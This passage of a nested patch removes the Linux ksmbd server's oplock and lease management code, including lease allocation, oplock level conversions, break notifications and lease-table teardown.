+-	init_waitqueue_head(&opinfo->oplock_brk);
+-	atomic_set(&opinfo->refcount, 1);
+-	atomic_set(&opinfo->breaking_cnt, 0);
+-
+-	return opinfo;
+-}
+-
+-static void lease_add_list(struct oplock_info *opinfo)
+-{
+-	struct lease_table *lb = opinfo->o_lease->l_lb;
+-
+-	spin_lock(&lb->lb_lock);
+-	list_add_rcu(&opinfo->lease_entry, &lb->lease_list);
+-	spin_unlock(&lb->lb_lock);
+-}
+-
+-static void lease_del_list(struct oplock_info *opinfo)
+-{
+-	struct lease_table *lb = opinfo->o_lease->l_lb;
+-
+-	if (!lb)
+-		return;
+-
+-	spin_lock(&lb->lb_lock);
+-	if (list_empty(&opinfo->lease_entry)) {
+-		spin_unlock(&lb->lb_lock);
+-		return;
+-	}
+-
+-	list_del_init(&opinfo->lease_entry);
+-	opinfo->o_lease->l_lb = NULL;
+-	spin_unlock(&lb->lb_lock);
+-}
+-
+-static void lb_add(struct lease_table *lb)
+-{
+-	write_lock(&lease_list_lock);
+-	list_add(&lb->l_entry, &lease_table_list);
+-	write_unlock(&lease_list_lock);
+-}
+-
+-static int alloc_lease(struct oplock_info *opinfo, struct lease_ctx_info *lctx)
+-{
+-	struct lease *lease;
+-
+-	lease = kmalloc(sizeof(struct lease), GFP_KERNEL);
+-	if (!lease)
+-		return -ENOMEM;
+-
+-	memcpy(lease->lease_key, lctx->lease_key, SMB2_LEASE_KEY_SIZE);
+-	lease->state = lctx->req_state;
+-	lease->new_state = 0;
+-	lease->flags = lctx->flags;
+-	lease->duration = lctx->duration;
+-	memcpy(lease->parent_lease_key, lctx->parent_lease_key, SMB2_LEASE_KEY_SIZE);
+-	lease->version = lctx->version;
+-	lease->epoch = 0;
+-	INIT_LIST_HEAD(&opinfo->lease_entry);
+-	opinfo->o_lease = lease;
+-
+-	return 0;
+-}
+-
+-static void free_lease(struct oplock_info *opinfo)
+-{
+-	struct lease *lease;
+-
+-	lease = opinfo->o_lease;
+-	kfree(lease);
+-}
+-
+-static void free_opinfo(struct oplock_info *opinfo)
+-{
+-	if (opinfo->is_lease)
+-		free_lease(opinfo);
+-	kfree(opinfo);
+-}
+-
+-static inline void opinfo_free_rcu(struct rcu_head *rcu_head)
+-{
+-	struct oplock_info *opinfo;
+-
+-	opinfo = container_of(rcu_head, struct oplock_info, rcu_head);
+-	free_opinfo(opinfo);
+-}
+-
+-struct oplock_info *opinfo_get(struct ksmbd_file *fp)
+-{
+-	struct oplock_info *opinfo;
+-
+-	rcu_read_lock();
+-	opinfo = rcu_dereference(fp->f_opinfo);
+-	if (opinfo && !atomic_inc_not_zero(&opinfo->refcount))
+-		opinfo = NULL;
+-	rcu_read_unlock();
+-
+-	return opinfo;
+-}
+-
+-static struct oplock_info *opinfo_get_list(struct ksmbd_inode *ci)
+-{
+-	struct oplock_info *opinfo;
+-
+-	if (list_empty(&ci->m_op_list))
+-		return NULL;
+-
+-	rcu_read_lock();
+-	opinfo = list_first_or_null_rcu(&ci->m_op_list, struct oplock_info,
+-					op_entry);
+-	if (opinfo) {
+-		if (!atomic_inc_not_zero(&opinfo->refcount))
+-			opinfo = NULL;
+-		else {
+-			atomic_inc(&opinfo->conn->r_count);
+-			if (ksmbd_conn_releasing(opinfo->conn)) {
+-				atomic_dec(&opinfo->conn->r_count);
+-				atomic_dec(&opinfo->refcount);
+-				opinfo = NULL;
+-			}
+-		}
+-	}
+-
+-	rcu_read_unlock();
+-
+-	return opinfo;
+-}
+-
+-static void opinfo_conn_put(struct oplock_info *opinfo)
+-{
+-	struct ksmbd_conn *conn;
+-
+-	if (!opinfo)
+-		return;
+-
+-	conn = opinfo->conn;
+-	/*
+-	 * Checking waitqueue to dropping pending requests on
+-	 * disconnection. waitqueue_active is safe because it
+-	 * uses atomic operation for condition.
+-	 */
+-	if (!atomic_dec_return(&conn->r_count) && waitqueue_active(&conn->r_count_q))
+-		wake_up(&conn->r_count_q);
+-	opinfo_put(opinfo);
+-}
+-
+-void opinfo_put(struct oplock_info *opinfo)
+-{
+-	if (!atomic_dec_and_test(&opinfo->refcount))
+-		return;
+-
+-	call_rcu(&opinfo->rcu_head, opinfo_free_rcu);
+-}
+-
+-static void opinfo_add(struct oplock_info *opinfo)
+-{
+-	struct ksmbd_inode *ci = opinfo->o_fp->f_ci;
+-
+-	write_lock(&ci->m_lock);
+-	list_add_rcu(&opinfo->op_entry, &ci->m_op_list);
+-	write_unlock(&ci->m_lock);
+-}
+-
+-static void opinfo_del(struct oplock_info *opinfo)
+-{
+-	struct ksmbd_inode *ci = opinfo->o_fp->f_ci;
+-
+-	if (opinfo->is_lease) {
+-		write_lock(&lease_list_lock);
+-		lease_del_list(opinfo);
+-		write_unlock(&lease_list_lock);
+-	}
+-	write_lock(&ci->m_lock);
+-	list_del_rcu(&opinfo->op_entry);
+-	write_unlock(&ci->m_lock);
+-}
+-
+-static unsigned long opinfo_count(struct ksmbd_file *fp)
+-{
+-	if (ksmbd_stream_fd(fp))
+-		return atomic_read(&fp->f_ci->sop_count);
+-	else
+-		return atomic_read(&fp->f_ci->op_count);
+-}
+-
+-static void opinfo_count_inc(struct ksmbd_file *fp)
+-{
+-	if (ksmbd_stream_fd(fp))
+-		return atomic_inc(&fp->f_ci->sop_count);
+-	else
+-		return atomic_inc(&fp->f_ci->op_count);
+-}
+-
+-static void opinfo_count_dec(struct ksmbd_file *fp)
+-{
+-	if (ksmbd_stream_fd(fp))
+-		return atomic_dec(&fp->f_ci->sop_count);
+-	else
+-		return atomic_dec(&fp->f_ci->op_count);
+-}
+-
+-/**
+- * opinfo_write_to_read() - convert a write oplock to read oplock
+- * @opinfo:		current oplock info
+- *
+- * Return:      0 on success, otherwise -EINVAL
+- */
+-int opinfo_write_to_read(struct oplock_info *opinfo)
+-{
+-	struct lease *lease = opinfo->o_lease;
+-
+-	if (!(opinfo->level == SMB2_OPLOCK_LEVEL_BATCH ||
+-	      opinfo->level == SMB2_OPLOCK_LEVEL_EXCLUSIVE)) {
+-		pr_err("bad oplock(0x%x)\n", opinfo->level);
+-		if (opinfo->is_lease)
+-			pr_err("lease state(0x%x)\n", lease->state);
+-		return -EINVAL;
+-	}
+-	opinfo->level = SMB2_OPLOCK_LEVEL_II;
+-
+-	if (opinfo->is_lease)
+-		lease->state = lease->new_state;
+-	return 0;
+-}
+-
+-/**
+- * opinfo_read_handle_to_read() - convert a read/handle oplock to read oplock
+- * @opinfo:		current oplock info
+- *
+- * Return:      0 on success, otherwise -EINVAL
+- */
+-int opinfo_read_handle_to_read(struct oplock_info *opinfo)
+-{
+-	struct lease *lease = opinfo->o_lease;
+-
+-	lease->state = lease->new_state;
+-	opinfo->level = SMB2_OPLOCK_LEVEL_II;
+-	return 0;
+-}
+-
+-/**
+- * opinfo_write_to_none() - convert a write oplock to none
+- * @opinfo:	current oplock info
+- *
+- * Return:      0 on success, otherwise -EINVAL
+- */
+-int opinfo_write_to_none(struct oplock_info *opinfo)
+-{
+-	struct lease *lease = opinfo->o_lease;
+-
+-	if (!(opinfo->level == SMB2_OPLOCK_LEVEL_BATCH ||
+-	      opinfo->level == SMB2_OPLOCK_LEVEL_EXCLUSIVE)) {
+-		pr_err("bad oplock(0x%x)\n", opinfo->level);
+-		if (opinfo->is_lease)
+-			pr_err("lease state(0x%x)\n", lease->state);
+-		return -EINVAL;
+-	}
+-	opinfo->level = SMB2_OPLOCK_LEVEL_NONE;
+-	if (opinfo->is_lease)
+-		lease->state = lease->new_state;
+-	return 0;
+-}
+-
+-/**
+- * opinfo_read_to_none() - convert a write read to none
+- * @opinfo:	current oplock info
+- *
+- * Return:      0 on success, otherwise -EINVAL
+- */
+-int opinfo_read_to_none(struct oplock_info *opinfo)
+-{
+-	struct lease *lease = opinfo->o_lease;
+-
+-	if (opinfo->level != SMB2_OPLOCK_LEVEL_II) {
+-		pr_err("bad oplock(0x%x)\n", opinfo->level);
+-		if (opinfo->is_lease)
+-			pr_err("lease state(0x%x)\n", lease->state);
+-		return -EINVAL;
+-	}
+-	opinfo->level = SMB2_OPLOCK_LEVEL_NONE;
+-	if (opinfo->is_lease)
+-		lease->state = lease->new_state;
+-	return 0;
+-}
+-
+-/**
+- * lease_read_to_write() - upgrade lease state from read to write
+- * @opinfo:	current lease info
+- *
+- * Return:      0 on success, otherwise -EINVAL
+- */
+-int lease_read_to_write(struct oplock_info *opinfo)
+-{
+-	struct lease *lease = opinfo->o_lease;
+-
+-	if (!(lease->state & SMB2_LEASE_READ_CACHING_LE)) {
+-		ksmbd_debug(OPLOCK, "bad lease state(0x%x)\n", lease->state);
+-		return -EINVAL;
+-	}
+-
+-	lease->new_state = SMB2_LEASE_NONE_LE;
+-	lease->state |= SMB2_LEASE_WRITE_CACHING_LE;
+-	if (lease->state & SMB2_LEASE_HANDLE_CACHING_LE)
+-		opinfo->level = SMB2_OPLOCK_LEVEL_BATCH;
+-	else
+-		opinfo->level = SMB2_OPLOCK_LEVEL_EXCLUSIVE;
+-	return 0;
+-}
+-
+-/**
+- * lease_none_upgrade() - upgrade lease state from none
+- * @opinfo:	current lease info
+- * @new_state:	new lease state
+- *
+- * Return:	0 on success, otherwise -EINVAL
+- */
+-static int lease_none_upgrade(struct oplock_info *opinfo, __le32 new_state)
+-{
+-	struct lease *lease = opinfo->o_lease;
+-
+-	if (!(lease->state == SMB2_LEASE_NONE_LE)) {
+-		ksmbd_debug(OPLOCK, "bad lease state(0x%x)\n", lease->state);
+-		return -EINVAL;
+-	}
+-
+-	lease->new_state = SMB2_LEASE_NONE_LE;
+-	lease->state = new_state;
+-	if (lease->state & SMB2_LEASE_HANDLE_CACHING_LE)
+-		if (lease->state & SMB2_LEASE_WRITE_CACHING_LE)
+-			opinfo->level = SMB2_OPLOCK_LEVEL_BATCH;
+-		else
+-			opinfo->level = SMB2_OPLOCK_LEVEL_II;
+-	else if (lease->state & SMB2_LEASE_WRITE_CACHING_LE)
+-		opinfo->level = SMB2_OPLOCK_LEVEL_EXCLUSIVE;
+-	else if (lease->state & SMB2_LEASE_READ_CACHING_LE)
+-		opinfo->level = SMB2_OPLOCK_LEVEL_II;
+-
+-	return 0;
+-}
+-
+-/**
+- * close_id_del_oplock() - release oplock object at file close time
+- * @fp:		ksmbd file pointer
+- */
+-void close_id_del_oplock(struct ksmbd_file *fp)
+-{
+-	struct oplock_info *opinfo;
+-
+-	if (S_ISDIR(file_inode(fp->filp)->i_mode))
+-		return;
+-
+-	opinfo = opinfo_get(fp);
+-	if (!opinfo)
+-		return;
+-
+-	opinfo_del(opinfo);
+-
+-	rcu_assign_pointer(fp->f_opinfo, NULL);
+-	if (opinfo->op_state == OPLOCK_ACK_WAIT) {
+-		opinfo->op_state = OPLOCK_CLOSING;
+-		wake_up_interruptible_all(&opinfo->oplock_q);
+-		if (opinfo->is_lease) {
+-			atomic_set(&opinfo->breaking_cnt, 0);
+-			wake_up_interruptible_all(&opinfo->oplock_brk);
+-		}
+-	}
+-
+-	opinfo_count_dec(fp);
+-	atomic_dec(&opinfo->refcount);
+-	opinfo_put(opinfo);
+-}
+-
+-/**
+- * grant_write_oplock() - grant exclusive/batch oplock or write lease
+- * @opinfo_new:	new oplock info object
+- * @req_oplock: request oplock
+- * @lctx:	lease context information
+- *
+- * Return:      0
+- */
+-static void grant_write_oplock(struct oplock_info *opinfo_new, int req_oplock,
+-			       struct lease_ctx_info *lctx)
+-{
+-	struct lease *lease = opinfo_new->o_lease;
+-
+-	if (req_oplock == SMB2_OPLOCK_LEVEL_BATCH)
+-		opinfo_new->level = SMB2_OPLOCK_LEVEL_BATCH;
+-	else
+-		opinfo_new->level = SMB2_OPLOCK_LEVEL_EXCLUSIVE;
+-
+-	if (lctx) {
+-		lease->state = lctx->req_state;
+-		memcpy(lease->lease_key, lctx->lease_key, SMB2_LEASE_KEY_SIZE);
+-	}
+-}
+-
+-/**
+- * grant_read_oplock() - grant level2 oplock or read lease
+- * @opinfo_new:	new oplock info object
+- * @lctx:	lease context information
+- *
+- * Return:      0
+- */
+-static void grant_read_oplock(struct oplock_info *opinfo_new,
+-			      struct lease_ctx_info *lctx)
+-{
+-	struct lease *lease = opinfo_new->o_lease;
+-
+-	opinfo_new->level = SMB2_OPLOCK_LEVEL_II;
+-
+-	if (lctx) {
+-		lease->state = SMB2_LEASE_READ_CACHING_LE;
+-		if (lctx->req_state & SMB2_LEASE_HANDLE_CACHING_LE)
+-			lease->state |= SMB2_LEASE_HANDLE_CACHING_LE;
+-		memcpy(lease->lease_key, lctx->lease_key, SMB2_LEASE_KEY_SIZE);
+-	}
+-}
+-
+-/**
+- * grant_none_oplock() - grant none oplock or none lease
+- * @opinfo_new:	new oplock info object
+- * @lctx:	lease context information
+- *
+- * Return:      0
+- */
+-static void grant_none_oplock(struct oplock_info *opinfo_new,
+-			      struct lease_ctx_info *lctx)
+-{
+-	struct lease *lease = opinfo_new->o_lease;
+-
+-	opinfo_new->level = SMB2_OPLOCK_LEVEL_NONE;
+-
+-	if (lctx) {
+-		lease->state = 0;
+-		memcpy(lease->lease_key, lctx->lease_key, SMB2_LEASE_KEY_SIZE);
+-	}
+-}
+-
+-static inline int compare_guid_key(struct oplock_info *opinfo,
+-				   const char *guid1, const char *key1)
+-{
+-	const char *guid2, *key2;
+-
+-	guid2 = opinfo->conn->ClientGUID;
+-	key2 = opinfo->o_lease->lease_key;
+-	if (!memcmp(guid1, guid2, SMB2_CLIENT_GUID_SIZE) &&
+-	    !memcmp(key1, key2, SMB2_LEASE_KEY_SIZE))
+-		return 1;
+-
+-	return 0;
+-}
+-
+-/**
+- * same_client_has_lease() - check whether current lease request is
+- *		from lease owner of file
+- * @ci:		master file pointer
+- * @client_guid:	Client GUID
+- * @lctx:		lease context information
+- *
+- * Return:      oplock(lease) object on success, otherwise NULL
+- */
+-static struct oplock_info *same_client_has_lease(struct ksmbd_inode *ci,
+-						 char *client_guid,
+-						 struct lease_ctx_info *lctx)
+-{
+-	int ret;
+-	struct lease *lease;
+-	struct oplock_info *opinfo;
+-	struct oplock_info *m_opinfo = NULL;
+-
+-	if (!lctx)
+-		return NULL;
+-
+-	/*
+-	 * Compare lease key and client_guid to know request from same owner
+-	 * of same client
+-	 */
+-	read_lock(&ci->m_lock);
+-	list_for_each_entry(opinfo, &ci->m_op_list, op_entry) {
+-		if (!opinfo->is_lease)
+-			continue;
+-		read_unlock(&ci->m_lock);
+-		lease = opinfo->o_lease;
+-
+-		ret = compare_guid_key(opinfo, client_guid, lctx->lease_key);
+-		if (ret) {
+-			m_opinfo = opinfo;
+-			/* skip upgrading lease about breaking lease */
+-			if (atomic_read(&opinfo->breaking_cnt)) {
+-				read_lock(&ci->m_lock);
+-				continue;
+-			}
+-
+-			/* upgrading lease */
+-			if ((atomic_read(&ci->op_count) +
+-			     atomic_read(&ci->sop_count)) == 1) {
+-				if (lease->state ==
+-				    (lctx->req_state & lease->state)) {
+-					lease->state |= lctx->req_state;
+-					if (lctx->req_state &
+-						SMB2_LEASE_WRITE_CACHING_LE)
+-						lease_read_to_write(opinfo);
+-				}
+-			} else if ((atomic_read(&ci->op_count) +
+-				    atomic_read(&ci->sop_count)) > 1) {
+-				if (lctx->req_state ==
+-				    (SMB2_LEASE_READ_CACHING_LE |
+-				     SMB2_LEASE_HANDLE_CACHING_LE))
+-					lease->state = lctx->req_state;
+-			}
+-
+-			if (lctx->req_state && lease->state ==
+-			    SMB2_LEASE_NONE_LE)
+-				lease_none_upgrade(opinfo, lctx->req_state);
+-		}
+-		read_lock(&ci->m_lock);
+-	}
+-	read_unlock(&ci->m_lock);
+-
+-	return m_opinfo;
+-}
+-
+-static void wait_for_break_ack(struct oplock_info *opinfo)
+-{
+-	int rc = 0;
+-
+-	rc = wait_event_interruptible_timeout(opinfo->oplock_q,
+-					      opinfo->op_state == OPLOCK_STATE_NONE ||
+-					      opinfo->op_state == OPLOCK_CLOSING,
+-					      OPLOCK_WAIT_TIME);
+-
+-	/* is this a timeout ? */
+-	if (!rc) {
+-		if (opinfo->is_lease)
+-			opinfo->o_lease->state = SMB2_LEASE_NONE_LE;
+-		opinfo->level = SMB2_OPLOCK_LEVEL_NONE;
+-		opinfo->op_state = OPLOCK_STATE_NONE;
+-	}
+-}
+-
+-static void wake_up_oplock_break(struct oplock_info *opinfo)
+-{
+-	clear_bit_unlock(0, &opinfo->pending_break);
+-	/* memory barrier is needed for wake_up_bit() */
+-	smp_mb__after_atomic();
+-	wake_up_bit(&opinfo->pending_break, 0);
+-}
+-
+-static int oplock_break_pending(struct oplock_info *opinfo, int req_op_level)
+-{
+-	while (test_and_set_bit(0, &opinfo->pending_break)) {
+-		wait_on_bit(&opinfo->pending_break, 0, TASK_UNINTERRUPTIBLE);
+-
+-		/* Not immediately break to none. */
+-		opinfo->open_trunc = 0;
+-
+-		if (opinfo->op_state == OPLOCK_CLOSING)
+-			return -ENOENT;
+-		else if (!opinfo->is_lease && opinfo->level <= req_op_level)
+-			return 1;
+-	}
+-
+-	if (!opinfo->is_lease && opinfo->level <= req_op_level) {
+-		wake_up_oplock_break(opinfo);
+-		return 1;
+-	}
+-	return 0;
+-}
+-
+-static inline int allocate_oplock_break_buf(struct ksmbd_work *work)
+-{
+-	work->response_buf = kzalloc(MAX_CIFS_SMALL_BUFFER_SIZE, GFP_KERNEL);
+-	if (!work->response_buf)
+-		return -ENOMEM;
+-	work->response_sz = MAX_CIFS_SMALL_BUFFER_SIZE;
+-	return 0;
+-}
+-
+-/**
+- * __smb2_oplock_break_noti() - send smb2 oplock break cmd from conn
+- * to client
+- * @wk:     smb work object
+- *
+- * There are two ways this function can be called. 1- while file open we break
+- * from exclusive/batch lock to levelII oplock and 2- while file write/truncate
+- * we break from levelII oplock no oplock.
+- * work->request_buf contains oplock_info.
+- */
+-static void __smb2_oplock_break_noti(struct work_struct *wk)
+-{
+-	struct smb2_oplock_break *rsp = NULL;
+-	struct ksmbd_work *work = container_of(wk, struct ksmbd_work, work);
+-	struct ksmbd_conn *conn = work->conn;
+-	struct oplock_break_info *br_info = work->request_buf;
+-	struct smb2_hdr *rsp_hdr;
+-	struct ksmbd_file *fp;
+-
+-	fp = ksmbd_lookup_durable_fd(br_info->fid);
+-	if (!fp)
+-		goto out;
+-
+-	if (allocate_oplock_break_buf(work)) {
+-		pr_err("smb2_allocate_rsp_buf failed! ");
+-		ksmbd_fd_put(work, fp);
+-		goto out;
+-	}
+-
+-	rsp_hdr = smb2_get_msg(work->response_buf);
+-	memset(rsp_hdr, 0, sizeof(struct smb2_hdr) + 2);
+-	*(__be32 *)work->response_buf =
+-		cpu_to_be32(conn->vals->header_size);
+-	rsp_hdr->ProtocolId = SMB2_PROTO_NUMBER;
+-	rsp_hdr->StructureSize = SMB2_HEADER_STRUCTURE_SIZE;
+-	rsp_hdr->CreditRequest = cpu_to_le16(0);
+-	rsp_hdr->Command = SMB2_OPLOCK_BREAK;
+-	rsp_hdr->Flags = (SMB2_FLAGS_SERVER_TO_REDIR);
+-	rsp_hdr->NextCommand = 0;
+-	rsp_hdr->MessageId = cpu_to_le64(-1);
+-	rsp_hdr->Id.SyncId.ProcessId = 0;
+-	rsp_hdr->Id.SyncId.TreeId = 0;
+-	rsp_hdr->SessionId = 0;
+-	memset(rsp_hdr->Signature, 0, 16);
+-
+-	rsp = smb2_get_msg(work->response_buf);
+-
+-	rsp->StructureSize = cpu_to_le16(24);
+-	if (!br_info->open_trunc &&
+-	    (br_info->level == SMB2_OPLOCK_LEVEL_BATCH ||
+-	     br_info->level == SMB2_OPLOCK_LEVEL_EXCLUSIVE))
+-		rsp->OplockLevel = SMB2_OPLOCK_LEVEL_II;
+-	else
+-		rsp->OplockLevel = SMB2_OPLOCK_LEVEL_NONE;
+-	rsp->Reserved = 0;
+-	rsp->Reserved2 = 0;
+-	rsp->PersistentFid = fp->persistent_id;
+-	rsp->VolatileFid = fp->volatile_id;
+-
+-	inc_rfc1001_len(work->response_buf, 24);
+-
+-	ksmbd_debug(OPLOCK,
+-		    "sending oplock break v_id %llu p_id = %llu lock level = %d\n",
+-		    rsp->VolatileFid, rsp->PersistentFid, rsp->OplockLevel);
+-
+-	ksmbd_fd_put(work, fp);
+-	ksmbd_conn_write(work);
+-
+-out:
+-	ksmbd_free_work_struct(work);
+-}
+-
+-/**
+- * smb2_oplock_break_noti() - send smb2 exclusive/batch to level2 oplock
+- *		break command from server to client
+- * @opinfo:		oplock info object
+- *
+- * Return:      0 on success, otherwise error
+- */
+-static int smb2_oplock_break_noti(struct oplock_info *opinfo)
+-{
+-	struct ksmbd_conn *conn = opinfo->conn;
+-	struct oplock_break_info *br_info;
+-	int ret = 0;
+-	struct ksmbd_work *work = ksmbd_alloc_work_struct();
+-
+-	if (!work)
+-		return -ENOMEM;
+-
+-	br_info = kmalloc(sizeof(struct oplock_break_info), GFP_KERNEL);
+-	if (!br_info) {
+-		ksmbd_free_work_struct(work);
+-		return -ENOMEM;
+-	}
+-
+-	br_info->level = opinfo->level;
+-	br_info->fid = opinfo->fid;
+-	br_info->open_trunc = opinfo->open_trunc;
+-
+-	work->request_buf = (char *)br_info;
+-	work->conn = conn;
+-	work->sess = opinfo->sess;
+-
+-	if (opinfo->op_state == OPLOCK_ACK_WAIT) {
+-		INIT_WORK(&work->work, __smb2_oplock_break_noti);
+-		ksmbd_queue_work(work);
+-
+-		wait_for_break_ack(opinfo);
+-	} else {
+-		__smb2_oplock_break_noti(&work->work);
+-		if (opinfo->level == SMB2_OPLOCK_LEVEL_II)
+-			opinfo->level = SMB2_OPLOCK_LEVEL_NONE;
+-	}
+-	return ret;
+-}
+-
+-/**
+- * __smb2_lease_break_noti() - send lease break command from server
+- * to client
+- * @wk:     smb work object
+- */
+-static void __smb2_lease_break_noti(struct work_struct *wk)
+-{
+-	struct smb2_lease_break *rsp = NULL;
+-	struct ksmbd_work *work = container_of(wk, struct ksmbd_work, work);
+-	struct lease_break_info *br_info = work->request_buf;
+-	struct ksmbd_conn *conn = work->conn;
+-	struct smb2_hdr *rsp_hdr;
+-
+-	if (allocate_oplock_break_buf(work)) {
+-		ksmbd_debug(OPLOCK, "smb2_allocate_rsp_buf failed! ");
+-		goto out;
+-	}
+-
+-	rsp_hdr = smb2_get_msg(work->response_buf);
+-	memset(rsp_hdr, 0, sizeof(struct smb2_hdr) + 2);
+-	*(__be32 *)work->response_buf =
+-		cpu_to_be32(conn->vals->header_size);
+-	rsp_hdr->ProtocolId = SMB2_PROTO_NUMBER;
+-	rsp_hdr->StructureSize = SMB2_HEADER_STRUCTURE_SIZE;
+-	rsp_hdr->CreditRequest = cpu_to_le16(0);
+-	rsp_hdr->Command = SMB2_OPLOCK_BREAK;
+-	rsp_hdr->Flags = (SMB2_FLAGS_SERVER_TO_REDIR);
+-	rsp_hdr->NextCommand = 0;
+-	rsp_hdr->MessageId = cpu_to_le64(-1);
+-	rsp_hdr->Id.SyncId.ProcessId = 0;
+-	rsp_hdr->Id.SyncId.TreeId = 0;
+-	rsp_hdr->SessionId = 0;
+-	memset(rsp_hdr->Signature, 0, 16);
+-
+-	rsp = smb2_get_msg(work->response_buf);
+-	rsp->StructureSize = cpu_to_le16(44);
+-	rsp->Epoch = br_info->epoch;
+-	rsp->Flags = 0;
+-
+-	if (br_info->curr_state & (SMB2_LEASE_WRITE_CACHING_LE |
+-			SMB2_LEASE_HANDLE_CACHING_LE))
+-		rsp->Flags = SMB2_NOTIFY_BREAK_LEASE_FLAG_ACK_REQUIRED;
+-
+-	memcpy(rsp->LeaseKey, br_info->lease_key, SMB2_LEASE_KEY_SIZE);
+-	rsp->CurrentLeaseState = br_info->curr_state;
+-	rsp->NewLeaseState = br_info->new_state;
+-	rsp->BreakReason = 0;
+-	rsp->AccessMaskHint = 0;
+-	rsp->ShareMaskHint = 0;
+-
+-	inc_rfc1001_len(work->response_buf, 44);
+-
+-	ksmbd_conn_write(work);
+-
+-out:
+-	ksmbd_free_work_struct(work);
+-}
+-
+-/**
+- * smb2_lease_break_noti() - break lease when a new client request
+- *			write lease
+- * @opinfo:		conains lease state information
+- *
+- * Return:	0 on success, otherwise error
+- */
+-static int smb2_lease_break_noti(struct oplock_info *opinfo)
+-{
+-	struct ksmbd_conn *conn = opinfo->conn;
+-	struct list_head *tmp, *t;
+-	struct ksmbd_work *work;
+-	struct lease_break_info *br_info;
+-	struct lease *lease = opinfo->o_lease;
+-
+-	work = ksmbd_alloc_work_struct();
+-	if (!work)
+-		return -ENOMEM;
+-
+-	br_info = kmalloc(sizeof(struct lease_break_info), GFP_KERNEL);
+-	if (!br_info) {
+-		ksmbd_free_work_struct(work);
+-		return -ENOMEM;
+-	}
+-
+-	br_info->curr_state = lease->state;
+-	br_info->new_state = lease->new_state;
+-	if (lease->version == 2)
+-		br_info->epoch = cpu_to_le16(++lease->epoch);
+-	else
+-		br_info->epoch = 0;
+-	memcpy(br_info->lease_key, lease->lease_key, SMB2_LEASE_KEY_SIZE);
+-
+-	work->request_buf = (char *)br_info;
+-	work->conn = conn;
+-	work->sess = opinfo->sess;
+-
+-	if (opinfo->op_state == OPLOCK_ACK_WAIT) {
+-		list_for_each_safe(tmp, t, &opinfo->interim_list) {
+-			struct ksmbd_work *in_work;
+-
+-			in_work = list_entry(tmp, struct ksmbd_work,
+-					     interim_entry);
+-			setup_async_work(in_work, NULL, NULL);
+-			smb2_send_interim_resp(in_work, STATUS_PENDING);
+-			list_del(&in_work->interim_entry);
+-		}
+-		INIT_WORK(&work->work, __smb2_lease_break_noti);
+-		ksmbd_queue_work(work);
+-		wait_for_break_ack(opinfo);
+-	} else {
+-		__smb2_lease_break_noti(&work->work);
+-		if (opinfo->o_lease->new_state == SMB2_LEASE_NONE_LE) {
+-			opinfo->level = SMB2_OPLOCK_LEVEL_NONE;
+-			opinfo->o_lease->state = SMB2_LEASE_NONE_LE;
+-		}
+-	}
+-	return 0;
+-}
+-
+-static void wait_lease_breaking(struct oplock_info *opinfo)
+-{
+-	if (!opinfo->is_lease)
+-		return;
+-
+-	wake_up_interruptible_all(&opinfo->oplock_brk);
+-	if (atomic_read(&opinfo->breaking_cnt)) {
+-		int ret = 0;
+-
+-		ret = wait_event_interruptible_timeout(opinfo->oplock_brk,
+-						       atomic_read(&opinfo->breaking_cnt) == 0,
+-						       HZ);
+-		if (!ret)
+-			atomic_set(&opinfo->breaking_cnt, 0);
+-	}
+-}
+-
+-static int oplock_break(struct oplock_info *brk_opinfo, int req_op_level)
+-{
+-	int err = 0;
+-
+-	/* Need to break exclusive/batch oplock, write lease or overwrite_if */
+-	ksmbd_debug(OPLOCK,
+-		    "request to send oplock(level : 0x%x) break notification\n",
+-		    brk_opinfo->level);
+-
+-	if (brk_opinfo->is_lease) {
+-		struct lease *lease = brk_opinfo->o_lease;
+-
+-		atomic_inc(&brk_opinfo->breaking_cnt);
+-
+-		err = oplock_break_pending(brk_opinfo, req_op_level);
+-		if (err)
+-			return err < 0 ? err : 0;
+-
+-		if (brk_opinfo->open_trunc) {
+-			/*
+-			 * Create overwrite break trigger the lease break to
+-			 * none.
+-			 */
+-			lease->new_state = SMB2_LEASE_NONE_LE;
+-		} else {
+-			if (lease->state & SMB2_LEASE_WRITE_CACHING_LE) {
+-				if (lease->state & SMB2_LEASE_HANDLE_CACHING_LE)
+-					lease->new_state =
+-						SMB2_LEASE_READ_CACHING_LE |
+-						SMB2_LEASE_HANDLE_CACHING_LE;
+-				else
+-					lease->new_state =
+-						SMB2_LEASE_READ_CACHING_LE;
+-			} else {
+-				if (lease->state & SMB2_LEASE_HANDLE_CACHING_LE)
+-					lease->new_state =
+-						SMB2_LEASE_READ_CACHING_LE;
+-				else
+-					lease->new_state = SMB2_LEASE_NONE_LE;
+-			}
+-		}
+-
+-		if (lease->state & (SMB2_LEASE_WRITE_CACHING_LE |
+-				SMB2_LEASE_HANDLE_CACHING_LE))
+-			brk_opinfo->op_state = OPLOCK_ACK_WAIT;
+-		else
+-			atomic_dec(&brk_opinfo->breaking_cnt);
+-	} else {
+-		err = oplock_break_pending(brk_opinfo, req_op_level);
+-		if (err)
+-			return err < 0 ? err : 0;
+-
+-		if (brk_opinfo->level == SMB2_OPLOCK_LEVEL_BATCH ||
+-		    brk_opinfo->level == SMB2_OPLOCK_LEVEL_EXCLUSIVE)
+-			brk_opinfo->op_state = OPLOCK_ACK_WAIT;
+-	}
+-
+-	if (brk_opinfo->is_lease)
+-		err = smb2_lease_break_noti(brk_opinfo);
+-	else
+-		err = smb2_oplock_break_noti(brk_opinfo);
+-
+-	ksmbd_debug(OPLOCK, "oplock granted = %d\n", brk_opinfo->level);
+-	if (brk_opinfo->op_state == OPLOCK_CLOSING)
+-		err = -ENOENT;
+-	wake_up_oplock_break(brk_opinfo);
+-
+-	wait_lease_breaking(brk_opinfo);
+-
+-	return err;
+-}
+-
+-void destroy_lease_table(struct ksmbd_conn *conn)
+-{
+-	struct lease_table *lb, *lbtmp;
+-	struct oplock_info *opinfo;
+-
+-	write_lock(&lease_list_lock);
+-	if (list_empty(&lease_table_list)) {
+-		write_unlock(&lease_list_lock);
+-		return;
+-	}
+-
+-	list_for_each_entry_safe(lb, lbtmp, &lease_table_list, l_entry) {
+-		if (conn && memcmp(lb->client_guid, conn->ClientGUID,
+-				   SMB2_CLIENT_GUID_SIZE))
+-			continue;
+-again:
+-		rcu_read_lock();
+-		list_for_each_entry_rcu(opinfo, &lb->lease_list,
+-					lease_entry) {
+-			rcu_read_unlock();
+-			lease_del_list(opinfo);
+-			goto again;
+-		}
+-		rcu_read_unlock();
+-		list_del(&lb->l_entry);
+-		kfree(lb);
+-	}
+-	write_unlock(&lease_list_lock);
+-}
+-
+-int find_same_lease_key(struct ksmbd_session *sess, struct ksmbd_inode *ci,
+-			struct lease_ctx_info *lctx)
